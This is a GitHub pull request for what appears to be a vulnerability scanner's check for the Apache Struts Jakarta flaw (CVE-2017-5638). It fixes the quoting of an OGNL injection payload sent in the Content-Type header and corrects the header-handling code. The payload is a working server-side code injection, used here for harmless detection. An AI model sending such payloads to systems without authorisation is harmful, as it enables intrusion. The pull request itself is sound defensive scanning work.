### PR TITLE
apache_struts_jakarta_parser.rb (CVE-2017-5638)

### DIFF
--- a/lib/tasks/vuln/apache_struts_jakarta_parser.rb
+++ b/lib/tasks/vuln/apache_struts_jakarta_parser.rb
@@ -33,7 +33,7 @@ class ApacheStrutsJakartaParser < BaseTask
     uri = _get_entity_name
 
     headers = {}
-    headers["Content-Type"] = "%{#context[‘com.opensymphony.xwork2.dispatcher.HttpServletResponse’].addHeader(‘X-Intrigue-Struts’,888*888)}.multipart/form-data"
+    headers["Content-Type"] = "%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Intrigue-Struts',888*888)}.multipart/form-data"
     response = http_request(:get, uri, nil, headers) # no auth
 
     unless response
@@ -42,12 +42,12 @@ class ApacheStrutsJakartaParser < BaseTask
     end
 
     # show the response in the logs 
-    response.each {|x| _log "#{x}: #{response.header[x]}"}
+    response.headers.each {|x| _log "#{x}: #{response.headers[x]}"}
         
-    if response.header['X-Intrigue-Struts'] =~ /788544/
+    if response.headers['X-Intrigue-Struts'] =~ /788544/
       
       instance_details = { 
-        proof: "#{response.header['X-Intrigue-Struts']}",
+        proof: "#{response.headers['X-Intrigue-Struts']}",
       }
       _create_linked_issue "apache_struts_jakarta_parser", instance_details
     end


### PR DESCRIPTION
Hi team,

As mentioned in my [last pull request](https://github.com/intrigueio/intrigue-core/pull/199), there was a small typo regarding the single quotes which was preventing the vulnerable application from returning the correct response header confirming whether or not the application was vulnerable to CVE-2017-5638.

Along with that, there were a few small errors which was causing the task to error out as well such as when iterating over the `response` object to show the response headers in the logs it would use `response.each` instead of `response.headers.each`.

Furthermore when the task was comparing the values of the response headers returned, it was performing the comparison on `response.header` vs `response.headers` which was also causing it to error out.

Finally when creating the issue, it would attempt to log `response.header['X-Intrigue-Struts']` vs `response.headers['X-Intrigue-Struts']` which would cause it to fail with the same error as above.

Screenshot of it working correctly:

Notice the `[_] ["X-Intrigue-Struts", "788544"]:` shown in the logs:

![image](https://user-images.githubusercontent.com/13172047/95259786-92154880-07dc-11eb-9d56-23726f5fdff5.png)

Best regards,
Maxim





